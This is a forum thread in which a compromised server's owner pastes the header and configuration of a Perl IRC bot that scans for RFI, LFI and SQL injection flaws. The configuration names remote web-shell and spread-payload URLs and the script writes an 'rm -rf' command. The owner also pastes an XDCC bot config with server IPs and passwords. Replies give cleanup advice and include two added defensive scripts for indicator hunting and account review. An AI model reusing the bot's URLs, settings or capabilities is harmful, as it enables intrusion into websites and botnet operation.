Post #1, 07-21-2008 (Just Joined! | Join Date: Apr 2008 | Posts: 14)
My server is hacked, some IRC script...
Hello,
I have a big problem. I have a server at ThePlanet and in the last several days (maybe weeks) I sometimes see in the bandwidth graph that the 10mb/s link is 100% used, see http://img144.imageshack.us/img144/9...gimgphpvi3.png
Then I looked in var/tmp and found some bad code, maybe a script in which there are some hacker email addresses and some IPs. In one file I also see some IRC script, and on the net I found that the script is for IRC download or something similar.
This is an example of one file:

#!/usr/bin/perl
#####################################################################################
## ##
## ##
## 04/04/2008 ##
## Author : Osirys ##
## Team : Third Eye Security ##
## Ircd : 84.19.176.186 ##
## WebSite : ##
## Contact : osirys[at]live[dot]it ##
## ##
## ## IMPORTANT ## ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ##
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ##
## # SYSTEM MORE SECURE. ##
## ## ##
## ##
## Release: v5 Private ##
## I coded this tool only for fun , anyway it works well ! This is a Private ##
## Release, so if you have this Script, please, take care, and don't give it ##
## anyone ! Thank you. ##
## It's a IrcBot. So, after connecting on your Ircd, you can scan for RFI, ##
## LFI, SQL Injection on sites using dorks. ##
## Anyway, u may know, that this one is the better bot ever created ! ##
## Be happy ! ##
## ##
## Features: ##
## [+]Sql Injection Scanner ##
## [+]Remote File Inclusion Scanner ##
## [+]Local File Inclusion Scanner ##
## [+]Integrated Shell, so you can execute commands on the server ##
## [+]Security Mode to protect "dangerous" functions ##
## [+]Spread Mode, to activate or disable Spread Function ##
## [+]Bypass Engines ON: Google, Yahoo ##
## !: To "bypass" these engines, the Scanner just looks for websites on other ##
## engines that use the same bots than the main ones ##
## ##
## ##
#####################################################################################
### !!_/ PRIVATE
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
#######################################################
## CONFIGURATION //
#######################################################
my $id = "http://rawcraft.info/spread.txt??"; #Your RFI Response
my $shell = "http://r99.li/r57.txt??"; #Shell printed on the Vulnerable Site
my $ircd = "irc.indoirc.net";
my $port = "6667";
my $chan1 = "#fntsze.biz"; #Chan for Scan
my $chan2 = ""; #bot will be printed here too
my $nick="fntsze[".int(rand(1000))."]"; # Scanner Nickname
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "http://rawcraft.info/t.txt???";
my $spreadACT = 1; #0 ->disabled, 1 ->enabled
my $securityACT = 1; #0 ->disabled, 1 ->enabled
my $killpwd = "****off"; #Password to Kill the Bot
my $chidpwd = "****off"; #Password to change the RFI Response
my $cmdpwd = "****off"; #Password to execute commands on the server
my $secpwd = "****off";
my $spreadpwd = "****off";
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;
#######################################################
## END OF CONFIGURATION //
#######################################################
open( $f1le, ">", "rm.txt" );
print $f1le "\#!/usr/bin/perl\n";
print $f1le "exec(\"rm -rf \*siti\*\")\;\n";
close $f1le;

etc...

There are also some other files; here is the beginning of one:

pidfile .s
logfile .f
logstats no
logrotate weekly
statefile .lib.css
xdcclistfile .lib.css~
connectionmethod direct
server 72.20.54.69 9000
server 194.169.192.55 9000
server 71.6.216.111 9000
server 72.20.54.69 31967
server 72.20.54.69 27397
server 72.20.54.69 48618
server 72.20.54.69 55493
server 71.6.216.111 65267
channel #ADD!KT!VE -plist 29 -key iNSOMNiA
channel #ADD!KT-test -plist 60 -key PRiVATE
nickserv_pass thu64l1f3
user_nick [EU]-N3W
user_realname 14,1# 14,1ADD4!14KT4!14VE
user_modes +iB
loginname FAST
#usenatip 78.31.115.159
slotsmax 15
queuesize 30
maxtransfersperperson 2
maxqueueditemsperperson 3
respondtochannelxdcc
downloadhost *!*@*
#headline 8,1welcome to everyone
creditline 14,1ADD4!14KT4!14VE
adminpass zBOTEinWEdNwI
adminhost mdma!*@global-threat.us
adminhost elmer*!*@elmer.wabbits.us
adminhost CHR0NiC!*@addikt-help.us
adminhost CHRONiC!*@addikt-help.us
adminhost WEED!*@*.addikt-help.us
uploadhost *!*@dean*.EsylumWarez.Net
uploadhost *!*@bobby811.EsylumWarez.Net
uploadhost mdma!*@global-threat.us
uploadhost elmer*!*@elmer.wabbits.us
uploadhost CHR0NiC*!*@addikt-help.us
uploadhost CHRONiC*!*@addikt-help.us
uploadhost WEED!*@*.addikt-help.us
uploadhost [EU]*!*@*
uploadhost [US]*!*@*
uploadhost [DiSTRO]*!*@*
uploadhost [KR]*!*@*
uploaddir /var/tmp/.lib
filedir /var/tmp/.lib
notifytime 10
nomd5sum

Does anybody have experience with this? How do I clean my server?
Thank you very much, Mladen
Post #2, 07-21-2008 (Just Joined! | Join Date: Apr 2008 | Posts: 14)
Uf, I mistook the forum category, please move it into the security forum.
One friend told me that I have an IRC bot on my server, but didn't tell me how to disable and remove it. It is a Perl script.
Can you tell me how to do this?
Post #3, 07-22-2008 (Just Joined! | Join Date: Sep 2007 | Location: Lafayette, IN | Posts: 83)
There are three things you need to do:
1. Eliminate the problem
2. Prevent the problem
3. Resume operations
To do part 1, the easiest way is to just delete the files. The trick here is finding all the files that need to be deleted. You should probably run chkrootkit (chkrootkit -- locally checks for signs of a rootkit) as well.
For part 2, you need to figure out how this happened in the first place. Did you or another user download the code? Do you have the latest patches for your OS and applications installed? Are you using a firewall? Once you've figured out how this IRC bot got installed, you can prevent it from happening in the future.
For part 3, if it's just a simple IRC bot, there's not much you need to do. However, it is hard to be sure if other things may have been changed as well (for example, the root password, firewall settings, etc). Honestly, your best bet is to find a backup from before this happened, and re-install.
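Step 1 above is mostly a hunt for everything the bot touched. As an added example (not from this thread), the script below pulls the indicators out of an iroffer-style config like the one in the first post and checks the live host for them; the sample config is constructed with documentation addresses, and `hunt` assumes iproute2's `ss` and a Linux `/proc`.

```shell
#!/bin/sh
# Added example, not code from the thread. Pull the indicators out of an iroffer-style
# bot config like the one found under /var/tmp, then check the live box for them.
# SAMPLE_CONFIG is constructed: the addresses are RFC 5737 documentation ranges,
# not the servers from the post. Read-only; run hunt as root on the affected server.

SAMPLE_CONFIG='pidfile .s
logfile .f
server 192.0.2.10 9000
server 198.51.100.7 31967
server 192.0.2.10 9000
channel #constructed-chan -plist 29 -key EXAMPLE
uploaddir /var/tmp/.lib
filedir /var/tmp/.lib
adminhost someone!*@example.invalid
uploadhost *!*@example.invalid'

# "ip port" for every server line, duplicates collapsed.
bot_servers() { printf '%s\n' "$1" | awk '$1 == "server" { print $2, $3 }' | sort -u; }

# Directories the bot stores files in; this is where the dropped files live.
bot_dirs() { printf '%s\n' "$1" | awk '$1 == "uploaddir" || $1 == "filedir" { print $2 }' | sort -u; }

# Operator hostmasks, for the incident report and the IRC network's abuse desk.
bot_operators() { printf '%s\n' "$1" | awk '$1 == "adminhost" || $1 == "uploadhost" { print $2 }' | sort -u; }

# Compare the extracted indicators with live state. Assumes iproute2's ss is present.
hunt() {
    bot_servers "$1" | while read -r ip port; do
        ss -ntp 2>/dev/null | grep -F "$ip:$port" && echo "ACTIVE connection to $ip:$port"
    done
    bot_dirs "$1" | while read -r d; do
        [ -d "$d" ] && { echo "bot directory present: $d"; ls -la "$d"; }
    done
    # On a server, a process whose binary lives in a tmp directory is suspect.
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            /tmp/*|/var/tmp/*|/dev/shm/*) echo "tmp-resident process ${p#/proc/}: $exe" ;;
        esac
    done
}

echo "IRC servers:"; bot_servers "$SAMPLE_CONFIG"
echo "bot dirs:";    bot_dirs "$SAMPLE_CONFIG"
echo "operators:";   bot_operators "$SAMPLE_CONFIG"
# On the compromised host: hunt "$(cat /var/tmp/.lib/<config file>)"
```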
Post #4, 07-22-2008
This is indeed an IRC bot, but Ben Cotton's advice is good.
Eliminating this one problem is easy -- you can just delete the files -- but you have a bigger problem on your hands. Someone nasty knows how to get into and operate your server. If you don't fix this problem, then they'll simply reinstall their bot.
In this case my advice is always the same (and the same as Ben's). Clean reinstall.
Hopefully you have some backups from before your system was compromised.
Post #5, 06-09-2009 (Just Joined! | Join Date: Jun 2009 | Posts: 1)
"ircbot"
That is not an ircbot, it's a script for a UNIX|Scanner.
It's for scanning for sites to "infect" with a unix bot for DDoS attacks, which is used for hitting off websites and/or a normal connection. If you do any type of DDoS attacking I would NOT be posting a scanner showing you have tools like this, even if you didn't add it to your server, which is kinda odd because it can only be added from the root user using SSH. You might wanna remove it from this site showing you have it on your server, because it pretty much makes your IRC a botnet, and you're pretty much showing others you have a botnet.
Post #6, 06-11-2009 (Linux Guru | Join Date: Apr 2009 | Location: I can be found either 40 miles west of Chicago, or in a galaxy far, far away. | Posts: 10,236)
Whatever you do, when you reimage your system, or clean it out, make sure you remove all unknown user accounts and change the password on all of the remaining ones. Then restrict SSH access, or disable it altogether. Also, configure your firewall more robustly. If you can, you could install SElinux to have a more secure foundation system.
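The account and SSH review above is easy to script. The following is an added example, not from this thread: it works on file paths so it can be pointed at the live system or at a mounted image of the old disk (`/mnt/old/etc/passwd`, say); the passwd and sshd_config samples it ships with are constructed.

```shell
#!/bin/sh
# Added example, not code from the thread. After a compromise, list the accounts that
# need a decision and the sshd settings that need tightening. Functions take a file
# path, so they also work on a mounted copy of the old disk. Sample files are constructed.

# Accounts with UID 0 other than root: a classic way to keep a way back in.
extra_root_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Accounts that still have a login shell. Every name printed must be one you
# recognise; anything else gets removed, and the rest get new passwords.
interactive_accounts() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# Weak sshd_config settings, matched case-insensitively; comment lines never match.
# The hardened counterparts are "PermitRootLogin no", "PasswordAuthentication no"
# (key-based logins only) and an AllowUsers line naming the admin account.
sshd_findings() {
    awk 'tolower($1) == "permitrootlogin" && tolower($2) == "yes" { print "PermitRootLogin yes: root can log in over SSH" }
         tolower($1) == "passwordauthentication" && tolower($2) == "yes" { print "PasswordAuthentication yes: exposed to password guessing" }
         tolower($1) == "permitemptypasswords" && tolower($2) == "yes" { print "PermitEmptyPasswords yes: blank passwords accepted" }' "$1"
}

# Constructed stand-ins for /etc/passwd and /etc/ssh/sshd_config.
TMP=$(mktemp -d); trap 'rm -rf "$TMP"' EXIT
cat > "$TMP/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
mladen:x:1000:1000::/home/mladen:/bin/bash
sys0:x:0:0::/var/tmp/.lib:/bin/sh
EOF
cat > "$TMP/sshd_config" <<'EOF'
# constructed sample
Port 22
PermitRootLogin yes
PasswordAuthentication yes
EOF
SAMPLE_PASSWD="$TMP/passwd"
SAMPLE_SSHD="$TMP/sshd_config"

echo "== UID-0 accounts besides root =="; extra_root_accounts "$SAMPLE_PASSWD"
echo "== accounts with a login shell ==";  interactive_accounts "$SAMPLE_PASSWD"
echo "== sshd findings ==";                sshd_findings "$SAMPLE_SSHD"
```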